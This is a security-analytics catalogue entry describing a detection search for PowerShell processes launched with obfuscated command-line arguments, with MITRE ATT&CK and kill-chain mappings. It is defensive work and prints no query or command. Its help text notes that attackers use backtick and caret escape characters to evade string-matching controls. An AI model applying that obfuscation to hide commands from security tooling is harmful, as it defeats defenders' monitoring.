Malicious PowerShell Process With Obfuscation Techniques

Description

This search looks for PowerShell processes launched with arguments that have characters indicative of obfuscation on the command-line.

Content Mapping

This content is not mapped to any local saved search. Add mapping


Use Case

Advanced Threat Detection

Category

Endpoint Compromise

Alert Volume

Medium

Journey

Stage 3

MITRE ATT&CK Tactics

Execution

MITRE ATT&CK Techniques

PowerShell
Scripting

Kill Chain Phases

Command and Control
Actions On Objectives

Data Sources

Endpoint Detection and Response

   Help

Malicious PowerShell Process With Obfuscation Techniques Help

This search looks for PowerShell processes that are passing command-line arguments with unusual characters (backticks and carets) that are PowerShell specific escape characters. Attackers use this obfuscation technique since it does not affect the functionality of PowerShell and it will bypass standard security controls that look for straight up malicious strings and commands. The search counts the occurrence of these obfuscation characters and lists out destination IPs running these PowerShell commands.